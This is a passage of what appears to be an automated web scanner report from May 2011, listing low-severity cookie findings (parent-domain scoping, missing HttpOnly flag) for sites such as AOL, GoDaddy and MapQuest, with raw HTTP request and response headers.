<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

10.115. http://www.huffingtonpost.com/users/logout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

10.116. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...

10.117. http://www.moviefone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...

10.118. http://www.truveo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...

10.119. http://www.truveo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 98 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://www.aol.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
  • tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
Content-Length: 63392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

11.2. http://www.aol.com/ajax.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1138
Set-Cookie: JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
Content-Length: 1138

<div id="local-module" class="mnid-local plid-60329">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News
...[SNIP]...

11.3. http://www.crunchboard.com/opening/detailjob.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crunchboard.com
Path:   /opening/detailjob.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
  • job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 11:10:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
Location: ./index.php
Vary: Accept-Encoding,User-Agent
Content-Length: 6901
Connection: close
Content-Type: text/html; charset=UTF-8

<script language="javascript" type="text/javascript">
   
   function hidestatus(URL)
   {
   /*var local= /http:|crunchboard.com/;
   var match = URL.search( local );
   if( match == -1 )
   {
   URL='http://tcbiz.p
...[SNIP]...

11.4. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

11.6. https://www.godaddy.com/gdshop/catalog.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/catalog.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/catalog.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:20 GMT
Location: /catalog.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:20 GMT
Connection: close


11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
  • traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

11.8. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


11.9. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


11.10. http://www.mapquest.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
  • psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
  • t_Id=ZGVmYXVsdDpudWxs; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
